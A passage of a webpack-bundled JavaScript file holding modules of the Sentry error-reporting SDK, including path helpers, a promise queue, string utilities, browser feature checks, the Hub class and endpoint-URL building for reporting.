    var isPathAbsolute = isAbsolute(path);
    var trailingSlash = path.substr(-1) === '/';
    // Normalize the path
    var normalizedPath = normalizeArray(path.split('/').filter(function (p) { return !!p; }), !isPathAbsolute).join('/');
    if (!normalizedPath && !isPathAbsolute) {
        normalizedPath = '.';
    }
    if (normalizedPath && trailingSlash) {
        normalizedPath += '/';
    }
    return (isPathAbsolute ? '/' : '') + normalizedPath;
}
// posix version
/** JSDoc */
function isAbsolute(path) {
    return path.charAt(0) === '/';
}
// posix version
/** JSDoc */
function join() {
    var args = [];
    for (var _i = 0; _i < arguments.length; _i++) {
        args[_i] = arguments[_i];
    }
    return normalizePath(args.join('/'));
}
/** JSDoc */
function dirname(path) {
    var result = splitPath(path);
    var root = result[0];
    var dir = result[1];
    if (!root && !dir) {
        // No dirname whatsoever
        return '.';
    }
    if (dir) {
        // It has a dirname, strip trailing slash
        dir = dir.substr(0, dir.length - 1);
    }
    return root + dir;
}
/** JSDoc */
function basename(path, ext) {
    var f = splitPath(path)[2];
    if (ext && f.substr(ext.length * -1) === ext) {
        f = f.substr(0, f.length - ext.length);
    }
    return f;
}
//# sourceMappingURL=path.js.map

/***/ }),
/* 3220 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return PromiseBuffer; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__error__ = __webpack_require__(1421);

/** A simple queue that holds promises. */
var PromiseBuffer = /** @class */ (function () {
    function PromiseBuffer(_limit) {
        this._limit = _limit;
        /** Internal set of queued Promises */
        this._buffer = [];
    }
    /**
     * Says if the buffer is ready to take more requests
     */
    PromiseBuffer.prototype.isReady = function () {
        return this._limit === undefined || this.length() < this._limit;
    };
    /**
     * Add a promise to the queue.
     *
     * @param task Can be any Promise<T>
     * @returns The original promise.
     */
    PromiseBuffer.prototype.add = function (task) {
        var _this = this;
        if (!this.isReady()) {
            return Promise.reject(new __WEBPACK_IMPORTED_MODULE_0__error__["a" /* SentryError */]('Not adding Promise due to buffer limit reached.'));
        }
        if (this._buffer.indexOf(task) === -1) {
            this._buffer.push(task);
        }
        task
            .then(function () { return _this.remove(task); })
            .catch(function () {
            return _this.remove(task).catch(function () {
                // We have to add this catch here otherwise we have an unhandledPromiseRejection
                // because it's a new Promise chain.
            });
        });
        return task;
    };
    /**
     * Remove a promise to the queue.
     *
     * @param task Can be any Promise<T>
     * @returns Removed promise.
     */
    PromiseBuffer.prototype.remove = function (task) {
        var removedTask = this._buffer.splice(this._buffer.indexOf(task), 1)[0];
        return removedTask;
    };
    /**
     * This function returns the number of unresolved promises in the queue.
     */
    PromiseBuffer.prototype.length = function () {
        return this._buffer.length;
    };
    /**
     * This will drain the whole queue, returns true if queue is empty or drained.
     * If timeout is provided and the queue takes longer to drain, the promise still resolves but with false.
     *
     * @param timeout Number in ms to wait until it resolves with false.
     */
    PromiseBuffer.prototype.drain = function (timeout) {
        var _this = this;
        return new Promise(function (resolve) {
            var capturedSetTimeout = setTimeout(function () {
                if (timeout && timeout > 0) {
                    resolve(false);
                }
            }, timeout);
            Promise.all(_this._buffer)
                .then(function () {
                clearTimeout(capturedSetTimeout);
                resolve(true);
            })
                .catch(function () {
                resolve(true);
            });
        });
    };
    return PromiseBuffer;
}());

//# sourceMappingURL=promisebuffer.js.map

/***/ }),
/* 3221 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["d"] = truncate;
/* unused harmony export snipLine */
/* harmony export (immutable) */ __webpack_exports__["c"] = safeJoin;
/* harmony export (immutable) */ __webpack_exports__["b"] = keysToEventMessage;
/* harmony export (immutable) */ __webpack_exports__["a"] = isMatchingPattern;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__is__ = __webpack_require__(514);

/**
 * Truncates given string to the maximum characters count
 *
 * @param str An object that contains serializable values
 * @param max Maximum number of characters in truncated string
 * @returns string Encoded
 */
function truncate(str, max) {
    if (max === void 0) { max = 0; }
    // tslint:disable-next-line:strict-type-predicates
    if (typeof str !== 'string' || max === 0) {
        return str;
    }
    return str.length <= max ? str : str.substr(0, max) + "...";
}
/**
 * This is basically just `trim_line` from
 * https://github.com/getsentry/sentry/blob/master/src/sentry/lang/javascript/processor.py#L67
 *
 * @param str An object that contains serializable values
 * @param max Maximum number of characters in truncated string
 * @returns string Encoded
 */
function snipLine(line, colno) {
    var newLine = line;
    var ll = newLine.length;
    if (ll <= 150) {
        return newLine;
    }
    if (colno > ll) {
        colno = ll; // tslint:disable-line:no-parameter-reassignment
    }
    var start = Math.max(colno - 60, 0);
    if (start < 5) {
        start = 0;
    }
    var end = Math.min(start + 140, ll);
    if (end > ll - 5) {
        end = ll;
    }
    if (end === ll) {
        start = Math.max(end - 140, 0);
    }
    newLine = newLine.slice(start, end);
    if (start > 0) {
        newLine = "'{snip} " + newLine;
    }
    if (end < ll) {
        newLine += ' {snip}';
    }
    return newLine;
}
/**
 * Join values in array
 * @param input array of values to be joined together
 * @param delimiter string to be placed in-between values
 * @returns Joined values
 */
function safeJoin(input, delimiter) {
    if (!Array.isArray(input)) {
        return '';
    }
    var output = [];
    // tslint:disable-next-line:prefer-for-of
    for (var i = 0; i < input.length; i++) {
        var value = input[i];
        try {
            output.push(String(value));
        }
        catch (e) {
            output.push('[value cannot be serialized]');
        }
    }
    return output.join(delimiter);
}
/** Merges provided array of keys into */
function keysToEventMessage(keys, maxLength) {
    if (maxLength === void 0) { maxLength = 40; }
    if (!keys.length) {
        return '[object has no keys]';
    }
    if (keys[0].length >= maxLength) {
        return truncate(keys[0], maxLength);
    }
    for (var includedKeys = keys.length; includedKeys > 0; includedKeys--) {
        var serialized = keys.slice(0, includedKeys).join(', ');
        if (serialized.length > maxLength) {
            continue;
        }
        if (includedKeys === keys.length) {
            return serialized;
        }
        return truncate(serialized, maxLength);
    }
    return '';
}
/**
 * Checks if the value matches a regex or includes the string
 * @param value The string value to be checked against
 * @param pattern Either a regex or a string that must be contained in value
 */
function isMatchingPattern(value, pattern) {
    if (Object(__WEBPACK_IMPORTED_MODULE_0__is__["g" /* isRegExp */])(pattern)) {
        return pattern.test(value);
    }
    if (typeof pattern === 'string') {
        return value.includes(pattern);
    }
    return false;
}
//# sourceMappingURL=string.js.map

/***/ }),
/* 3222 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export supportsErrorEvent */
/* unused harmony export supportsDOMError */
/* unused harmony export supportsDOMException */
/* harmony export (immutable) */ __webpack_exports__["a"] = supportsFetch;
/* harmony export (immutable) */ __webpack_exports__["c"] = supportsNativeFetch;
/* unused harmony export supportsReportingObserver */
/* harmony export (immutable) */ __webpack_exports__["d"] = supportsReferrerPolicy;
/* harmony export (immutable) */ __webpack_exports__["b"] = supportsHistory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__logger__ = __webpack_require__(1422);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__misc__ = __webpack_require__(769);


/**
 * Tells whether current environment supports ErrorEvent objects
 * {@link supportsErrorEvent}.
 *
 * @returns Answer to the given question.
 */
function supportsErrorEvent() {
    try {
        // tslint:disable:no-unused-expression
        new ErrorEvent('');
        return true;
    }
    catch (e) {
        return false;
    }
}
/**
 * Tells whether current environment supports DOMError objects
 * {@link supportsDOMError}.
 *
 * @returns Answer to the given question.
 */
function supportsDOMError() {
    try {
        // It really needs 1 argument, not 0.
        // Chrome: VM89:1 Uncaught TypeError: Failed to construct 'DOMError':
        // 1 argument required, but only 0 present.
        // @ts-ignore
        // tslint:disable:no-unused-expression
        new DOMError('');
        return true;
    }
    catch (e) {
        return false;
    }
}
/**
 * Tells whether current environment supports DOMException objects
 * {@link supportsDOMException}.
 *
 * @returns Answer to the given question.
 */
function supportsDOMException() {
    try {
        // tslint:disable:no-unused-expression
        new DOMException('');
        return true;
    }
    catch (e) {
        return false;
    }
}
/**
 * Tells whether current environment supports Fetch API
 * {@link supportsFetch}.
 *
 * @returns Answer to the given question.
 */
function supportsFetch() {
    if (!('fetch' in Object(__WEBPACK_IMPORTED_MODULE_1__misc__["e" /* getGlobalObject */])())) {
        return false;
    }
    try {
        // tslint:disable-next-line:no-unused-expression
        new Headers();
        // tslint:disable-next-line:no-unused-expression
        new Request('');
        // tslint:disable-next-line:no-unused-expression
        new Response();
        return true;
    }
    catch (e) {
        return false;
    }
}
/**
 * Tells whether current environment supports Fetch API natively
 * {@link supportsNativeFetch}.
 *
 * @returns true if `window.fetch` is natively implemented, false otherwise
 */
function supportsNativeFetch() {
    if (!supportsFetch()) {
        return false;
    }
    var isNativeFunc = function (func) { return func.toString().indexOf('native') !== -1; };
    var global = Object(__WEBPACK_IMPORTED_MODULE_1__misc__["e" /* getGlobalObject */])();
    var result = null;
    var doc = global.document;
    if (doc) {
        var sandbox = doc.createElement('iframe');
        sandbox.hidden = true;
        try {
            doc.head.appendChild(sandbox);
            if (sandbox.contentWindow && sandbox.contentWindow.fetch) {
                // tslint:disable-next-line no-unbound-method
                result = isNativeFunc(sandbox.contentWindow.fetch);
            }
            doc.head.removeChild(sandbox);
        }
        catch (err) {
            __WEBPACK_IMPORTED_MODULE_0__logger__["a" /* logger */].warn('Could not create sandbox iframe for pure fetch check, bailing to window.fetch: ', err);
        }
    }
    if (result === null) {
        // tslint:disable-next-line no-unbound-method
        result = isNativeFunc(global.fetch);
    }
    return result;
}
/**
 * Tells whether current environment supports ReportingObserver API
 * {@link supportsReportingObserver}.
 *
 * @returns Answer to the given question.
 */
function supportsReportingObserver() {
    // tslint:disable-next-line: no-unsafe-any
    return 'ReportingObserver' in Object(__WEBPACK_IMPORTED_MODULE_1__misc__["e" /* getGlobalObject */])();
}
/**
 * Tells whether current environment supports Referrer Policy API
 * {@link supportsReferrerPolicy}.
 *
 * @returns Answer to the given question.
 */
function supportsReferrerPolicy() {
    // Despite all stars in the sky saying that Edge supports old draft syntax, aka 'never', 'always', 'origin' and 'default
    // https://caniuse.com/#feat=referrer-policy
    // It doesn't. And it throw exception instead of ignoring this parameter...
    // REF: https://github.com/getsentry/raven-js/issues/1233
    if (!supportsFetch()) {
        return false;
    }
    try {
        // tslint:disable:no-unused-expression
        new Request('_', {
            referrerPolicy: 'origin',
        });
        return true;
    }
    catch (e) {
        return false;
    }
}
/**
 * Tells whether current environment supports History API
 * {@link supportsHistory}.
 *
 * @returns Answer to the given question.
 */
function supportsHistory() {
    // NOTE: in Chrome App environment, touching history.pushState, *even inside
    //       a try/catch block*, will cause Chrome to output an error to console.error
    // borrowed from: https://github.com/angular/angular.js/pull/13945/files
    var global = Object(__WEBPACK_IMPORTED_MODULE_1__misc__["e" /* getGlobalObject */])();
    var chrome = global.chrome;
    // tslint:disable-next-line:no-unsafe-any
    var isChromePackagedApp = chrome && chrome.app && chrome.app.runtime;
    var hasHistoryApi = 'history' in global && !!global.history.pushState && !!global.history.replaceState;
    return !isChromePackagedApp && hasHistoryApi;
}
//# sourceMappingURL=supports.js.map

/***/ }),
/* 3223 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SyncPromise; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__is__ = __webpack_require__(514);

/** SyncPromise internal states */
var States;
(function (States) {
    /** Pending */
    States["PENDING"] = "PENDING";
    /** Resolved / OK */
    States["RESOLVED"] = "RESOLVED";
    /** Rejected / Error */
    States["REJECTED"] = "REJECTED";
})(States || (States = {}));
/** JSDoc */
var SyncPromise = /** @class */ (function () {
    function SyncPromise(callback) {
        var _this = this;
        /** JSDoc */
        this._state = States.PENDING;
        /** JSDoc */
        this._handlers = [];
        /** JSDoc */
        this._resolve = function (value) {
            _this._setResult(value, States.RESOLVED);
        };
        /** JSDoc */
        this._reject = function (reason) {
            _this._setResult(reason, States.REJECTED);
        };
        /** JSDoc */
        this._setResult = function (value, state) {
            if (_this._state !== States.PENDING) {
                return;
            }
            if (Object(__WEBPACK_IMPORTED_MODULE_0__is__["j" /* isThenable */])(value)) {
                value.then(_this._resolve, _this._reject);
                return;
            }
            _this._value = value;
            _this._state = state;
            _this._executeHandlers();
        };
        /** JSDoc */
        this._executeHandlers = function () {
            if (_this._state === States.PENDING) {
                return;
            }
            if (_this._state === States.REJECTED) {
                // tslint:disable-next-line:no-unsafe-any
                _this._handlers.forEach(function (h) { return h.onFail && h.onFail(_this._value); });
            }
            else {
                // tslint:disable-next-line:no-unsafe-any
                _this._handlers.forEach(function (h) { return h.onSuccess && h.onSuccess(_this._value); });
            }
            _this._handlers = [];
            return;
        };
        /** JSDoc */
        this._attachHandler = function (handler) {
            _this._handlers = _this._handlers.concat(handler);
            _this._executeHandlers();
        };
        try {
            callback(this._resolve, this._reject);
        }
        catch (e) {
            this._reject(e);
        }
    }
    /** JSDoc */
    SyncPromise.prototype.then = function (onfulfilled, onrejected) {
        var _this = this;
        // public then<U>(onSuccess?: HandlerOnSuccess<T, U>, onFail?: HandlerOnFail<U>): SyncPromise<T | U> {
        return new SyncPromise(function (resolve, reject) {
            _this._attachHandler({
                onFail: function (reason) {
                    if (!onrejected) {
                        reject(reason);
                        return;
                    }
                    try {
                        resolve(onrejected(reason));
                        return;
                    }
                    catch (e) {
                        reject(e);
                        return;
                    }
                },
                onSuccess: function (result) {
                    if (!onfulfilled) {
                        resolve(result);
                        return;
                    }
                    try {
                        resolve(onfulfilled(result));
                        return;
                    }
                    catch (e) {
                        reject(e);
                        return;
                    }
                },
            });
        });
    };
    /** JSDoc */
    SyncPromise.prototype.catch = function (onFail) {
        // tslint:disable-next-line:no-unsafe-any
        return this.then(function (val) { return val; }, onFail);
    };
    /** JSDoc */
    SyncPromise.prototype.toString = function () {
        return "[object SyncPromise]";
    };
    /** JSDoc */
    SyncPromise.resolve = function (value) {
        return new SyncPromise(function (resolve) {
            resolve(value);
        });
    };
    /** JSDoc */
    SyncPromise.reject = function (reason) {
        return new SyncPromise(function (_, reject) {
            reject(reason);
        });
    };
    return SyncPromise;
}());

//# sourceMappingURL=syncpromise.js.map

/***/ }),
/* 3224 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(module) {/* unused harmony export API_VERSION */
/* unused harmony export Hub */
/* unused harmony export getMainCarrier */
/* unused harmony export makeMain */
/* harmony export (immutable) */ __webpack_exports__["a"] = getCurrentHub;
/* unused harmony export getHubFromCarrier */
/* unused harmony export setHubOnCarrier */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__scope__ = __webpack_require__(1420);



/**
 * API compatibility version of this hub.
 *
 * WARNING: This number should only be incresed when the global interface
 * changes a and new methods are introduced.
 *
 * @hidden
 */
var API_VERSION = 3;
/**
 * Default maximum number of breadcrumbs added to an event. Can be overwritten
 * with {@link Options.maxBreadcrumbs}.
 */
var DEFAULT_BREADCRUMBS = 30;
/**
 * Absolute maximum number of breadcrumbs added to an event. The
 * `maxBreadcrumbs` option cannot be higher than this value.
 */
var MAX_BREADCRUMBS = 100;
/**
 * @inheritDoc
 */
var Hub = /** @class */ (function () {
    /**
     * Creates a new instance of the hub, will push one {@link Layer} into the
     * internal stack on creation.
     *
     * @param client bound to the hub.
     * @param scope bound to the hub.
     * @param version number, higher number means higher priority.
     */
    function Hub(client, scope, _version) {
        if (scope === void 0) { scope = new __WEBPACK_IMPORTED_MODULE_2__scope__["a" /* Scope */](); }
        if (_version === void 0) { _version = API_VERSION; }
        this._version = _version;
        /** Is a {@link Layer}[] containing the client and scope */
        this._stack = [];
        this._stack.push({ client: client, scope: scope });
    }
    /**
     * Internal helper function to call a method on the top client if it exists.
     *
     * @param method The method to call on the client.
     * @param args Arguments to pass to the client function.
     */
    Hub.prototype._invokeClient = function (method) {
        var _a;
        var args = [];
        for (var _i = 1; _i < arguments.length; _i++) {
            args[_i - 1] = arguments[_i];
        }
        var top = this.getStackTop();
        if (top && top.client && top.client[method]) {
            (_a = top.client)[method].apply(_a, __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](args, [top.scope]));
        }
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.isOlderThan = function (version) {
        return this._version < version;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.bindClient = function (client) {
        var top = this.getStackTop();
        top.client = client;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.pushScope = function () {
        // We want to clone the content of prev scope
        var stack = this.getStack();
        var parentScope = stack.length > 0 ? stack[stack.length - 1].scope : undefined;
        var scope = __WEBPACK_IMPORTED_MODULE_2__scope__["a" /* Scope */].clone(parentScope);
        this.getStack().push({
            client: this.getClient(),
            scope: scope,
        });
        return scope;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.popScope = function () {
        return this.getStack().pop() !== undefined;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.withScope = function (callback) {
        var scope = this.pushScope();
        try {
            callback(scope);
        }
        finally {
            this.popScope();
        }
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.getClient = function () {
        return this.getStackTop().client;
    };
    /** Returns the scope of the top stack. */
    Hub.prototype.getScope = function () {
        return this.getStackTop().scope;
    };
    /** Returns the scope stack for domains or the process. */
    Hub.prototype.getStack = function () {
        return this._stack;
    };
    /** Returns the topmost scope layer in the order domain > local > process. */
    Hub.prototype.getStackTop = function () {
        return this._stack[this._stack.length - 1];
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.captureException = function (exception, hint) {
        var eventId = (this._lastEventId = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["E" /* uuid4 */])());
        var finalHint = hint;
        // If there's no explicit hint provided, mimick the same thing that would happen
        // in the minimal itself to create a consistent behavior.
        // We don't do this in the client, as it's the lowest level API, and doing this,
        // would prevent user from having full control over direct calls.
        if (!hint) {
            var syntheticException = void 0;
            try {
                throw new Error('Sentry syntheticException');
            }
            catch (exception) {
                syntheticException = exception;
            }
            finalHint = {
                originalException: exception,
                syntheticException: syntheticException,
            };
        }
        this._invokeClient('captureException', exception, __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, finalHint, { event_id: eventId }));
        return eventId;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.captureMessage = function (message, level, hint) {
        var eventId = (this._lastEventId = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["E" /* uuid4 */])());
        var finalHint = hint;
        // If there's no explicit hint provided, mimick the same thing that would happen
        // in the minimal itself to create a consistent behavior.
        // We don't do this in the client, as it's the lowest level API, and doing this,
        // would prevent user from having full control over direct calls.
        if (!hint) {
            var syntheticException = void 0;
            try {
                throw new Error(message);
            }
            catch (exception) {
                syntheticException = exception;
            }
            finalHint = {
                originalException: message,
                syntheticException: syntheticException,
            };
        }
        this._invokeClient('captureMessage', message, level, __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, finalHint, { event_id: eventId }));
        return eventId;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.captureEvent = function (event, hint) {
        var eventId = (this._lastEventId = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["E" /* uuid4 */])());
        this._invokeClient('captureEvent', event, __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, hint, { event_id: eventId }));
        return eventId;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.lastEventId = function () {
        return this._lastEventId;
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.addBreadcrumb = function (breadcrumb, hint) {
        var top = this.getStackTop();
        if (!top.scope || !top.client) {
            return;
        }
        var _a = (top.client.getOptions && top.client.getOptions()) || {}, _b = _a.beforeBreadcrumb, beforeBreadcrumb = _b === void 0 ? null : _b, _c = _a.maxBreadcrumbs, maxBreadcrumbs = _c === void 0 ? DEFAULT_BREADCRUMBS : _c;
        if (maxBreadcrumbs <= 0) {
            return;
        }
        var timestamp = new Date().getTime() / 1000;
        var mergedBreadcrumb = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({ timestamp: timestamp }, breadcrumb);
        var finalBreadcrumb = beforeBreadcrumb
            ? Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["e" /* consoleSandbox */])(function () { return beforeBreadcrumb(mergedBreadcrumb, hint); })
            : mergedBreadcrumb;
        if (finalBreadcrumb === null) {
            return;
        }
        top.scope.addBreadcrumb(finalBreadcrumb, Math.min(maxBreadcrumbs, MAX_BREADCRUMBS));
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setUser = function (user) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setUser(user);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setTags = function (tags) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setTags(tags);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setExtras = function (extras) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setExtras(extras);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setTag = function (key, value) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setTag(key, value);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setExtra = function (key, extra) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setExtra(key, extra);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.setContext = function (name, context) {
        var top = this.getStackTop();
        if (!top.scope) {
            return;
        }
        top.scope.setContext(name, context);
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.configureScope = function (callback) {
        var top = this.getStackTop();
        if (top.scope && top.client) {
            callback(top.scope);
        }
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.run = function (callback) {
        var oldHub = makeMain(this);
        try {
            callback(this);
        }
        finally {
            makeMain(oldHub);
        }
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.getIntegration = function (integration) {
        var client = this.getClient();
        if (!client) {
            return null;
        }
        try {
            return client.getIntegration(integration);
        }
        catch (_oO) {
            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].warn("Cannot retrieve integration " + integration.id + " from the current Hub");
            return null;
        }
    };
    /**
     * @inheritDoc
     */
    Hub.prototype.traceHeaders = function () {
        var top = this.getStackTop();
        if (top.scope && top.client) {
            var span = top.scope.getSpan();
            if (span) {
                return {
                    'sentry-trace': span.toTraceparent(),
                };
            }
        }
        return {};
    };
    return Hub;
}());

/** Returns the global shim registry. */
function getMainCarrier() {
    var carrier = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["i" /* getGlobalObject */])();
    carrier.__SENTRY__ = carrier.__SENTRY__ || {
        hub: undefined,
    };
    return carrier;
}
/**
 * Replaces the current main hub with the passed one on the global object
 *
 * @returns The old replaced hub
 */
function makeMain(hub) {
    var registry = getMainCarrier();
    var oldHub = getHubFromCarrier(registry);
    setHubOnCarrier(registry, hub);
    return oldHub;
}
/**
 * Returns the default hub instance.
 *
 * If a hub is already registered in the global carrier but this module
 * contains a more recent version, it replaces the registered version.
 * Otherwise, the currently registered hub will be returned.
 */
function getCurrentHub() {
    // Get main carrier (global for every environment)
    var registry = getMainCarrier();
    // If there's no hub, or its an old API, assign a new one
    if (!hasHubOnCarrier(registry) || getHubFromCarrier(registry).isOlderThan(API_VERSION)) {
        setHubOnCarrier(registry, new Hub());
    }
    // Prefer domains over global if they are there
    try {
        // We need to use `dynamicRequire` because `require` on it's own will be optimized by webpack.
        // We do not want this to happen, we need to try to `require` the domain node module and fail if we are in browser
        // for example so we do not have to shim it and use `getCurrentHub` universally.
        var domain = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["f" /* dynamicRequire */])(module, 'domain');
        var activeDomain = domain.active;
        // If there no active domain, just return global hub
        if (!activeDomain) {
            return getHubFromCarrier(registry);
        }
        // If there's no hub on current domain, or its an old API, assign a new one
        if (!hasHubOnCarrier(activeDomain) || getHubFromCarrier(activeDomain).isOlderThan(API_VERSION)) {
            var registryHubTopStack = getHubFromCarrier(registry).getStackTop();
            setHubOnCarrier(activeDomain, new Hub(registryHubTopStack.client, __WEBPACK_IMPORTED_MODULE_2__scope__["a" /* Scope */].clone(registryHubTopStack.scope)));
        }
        // Return hub that lives on a domain
        return getHubFromCarrier(activeDomain);
    }
    catch (_Oo) {
        // Return hub that lives on a global object
        return getHubFromCarrier(registry);
    }
}
/**
 * This will tell whether a carrier has a hub on it or not
 * @param carrier object
 */
function hasHubOnCarrier(carrier) {
    if (carrier && carrier.__SENTRY__ && carrier.__SENTRY__.hub) {
        return true;
    }
    return false;
}
/**
 * This will create a new {@link Hub} and add to the passed object on
 * __SENTRY__.hub.
 * @param carrier object
 * @hidden
 */
function getHubFromCarrier(carrier) {
    if (carrier && carrier.__SENTRY__ && carrier.__SENTRY__.hub) {
        return carrier.__SENTRY__.hub;
    }
    carrier.__SENTRY__ = carrier.__SENTRY__ || {};
    carrier.__SENTRY__.hub = new Hub();
    return carrier.__SENTRY__.hub;
}
/**
 * This will set passed {@link Hub} on the passed object's __SENTRY__.hub attribute
 * @param carrier object
 * @param hub Hub
 */
function setHubOnCarrier(carrier, hub) {
    if (!carrier) {
        return false;
    }
    carrier.__SENTRY__ = carrier.__SENTRY__ || {};
    carrier.__SENTRY__.hub = hub;
    return true;
}
//# sourceMappingURL=hub.js.map
/* WEBPACK VAR INJECTION */}.call(__webpack_exports__, __webpack_require__(213)(module)))

/***/ }),
/* 3225 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return API; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__dsn__ = __webpack_require__(770);


var SENTRY_API_VERSION = '7';
/** Helper class to provide urls to different Sentry endpoints. */
var API = /** @class */ (function () {
    /** Create a new instance of API */
    function API(dsn) {
        this.dsn = dsn;
        this._dsnObject = new __WEBPACK_IMPORTED_MODULE_1__dsn__["a" /* Dsn */](dsn);
    }
    /** Returns the Dsn object. */
    API.prototype.getDsn = function () {
        return this._dsnObject;
    };
    /** Returns a string with auth headers in the url to the store endpoint. */
    API.prototype.getStoreEndpoint = function () {
        return "" + this._getBaseUrl() + this.getStoreEndpointPath();
    };
    /** Returns the store endpoint with auth added in url encoded. */
    API.prototype.getStoreEndpointWithUrlEncodedAuth = function () {
        var dsn = this._dsnObject;
        var auth = {
            sentry_key: dsn.user,
            sentry_version: SENTRY_API_VERSION,
        };
        // Auth is intentionally sent as part of query string (NOT as custom HTTP header)
        // to avoid preflight CORS requests
        return this.getStoreEndpoint() + "?" + Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["D" /* urlEncode */])(auth);
    };
    /** Returns the base path of the url including the port. */
    API.prototype._getBaseUrl = function () {
        var dsn = this._dsnObject;
        var protocol = dsn.protocol ? dsn.protocol + ":" : '';
        var port = dsn.port ? ":" + dsn.port : '';
        return protocol + "//" + dsn.host + port;
    };
    /** Returns only the path component for the store endpoint. */
    API.prototype.getStoreEndpointPath = function () {
        var dsn = this._dsnObject;
        return (dsn.path ? "/" + dsn.path : '') + "/api/" + dsn.projectId + "/store/";
    };
    /** Returns an object that can be used in request headers. */
    API.prototype.getRequestHeaders = function (clientName, clientVersion) {
        var dsn = this._dsnObject;
        var header = ["Sentry sentry_version=" + SENTRY_API_VERSION];
        header.push("sentry_timestamp=" + new Date().getTime());
        header.push("sentry_client=" + clientName + "/" + clientVersion);
        header.push("sentry_key=" + dsn.user);
        if (dsn.pass) {
            header.push("sentry_secret=" + dsn.pass);
        }
        return {
            'Content-Type': 'application/json',
            'X-Sentry-Auth': header.join(', '),
        };
    };
    /** Returns the url to the report dialog endpoint. */
    API.prototype.getReportDialogEndpoint = function (dialogOptions) {
        if (dialogOptions === void 0) { dialogOptions = {}; }
        var dsn = this._dsnObject;
        var endpoint = "" + this._getBaseUrl() + (dsn.path ? "/" + dsn.path : '') + "/api/embed/error-page/";
        var encodedOptions = [];
        encodedOptions.push("dsn=" + dsn.toString());
        for (var key in dialogOptions) {
            if (key === 'user') {
                if (!dialogOptions.user) {
                    continue;
                }
                if (dialogOptions.user.name) {
                    encodedOptions.push("name=" + encodeURIComponent(dialogOptions.user.name));
                }
                if (dialogOptions.user.email) {
                    encodedOptions.push("email=" + encodeURIComponent(dialogOptions.user.email));
                }
            }
            else {
                encodedOptions.push(encodeURIComponent(key) + "=" + encodeURIComponent(dialogOptions[key]));
            }
        }
        if (encodedOptions.length) {
            return endpoint + "?" + encodedOptions.join('&');
        }
        return endpoint;
    };
    return API;
}());

//# sourceMappingURL=api.js.map

/***/ }),
/* 3226 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BaseClient; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__dsn__ = __webpack_require__(770);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__integration__ = __webpack_require__(3227);




/**
 * Base implementation for all JavaScript SDK clients.
 *
 * Call the constructor with the corresponding backend constructor and options
 * specific to the client subclass. To access these options later, use
 * {@link Client.getOptions}. Also, the Backend instance is available via
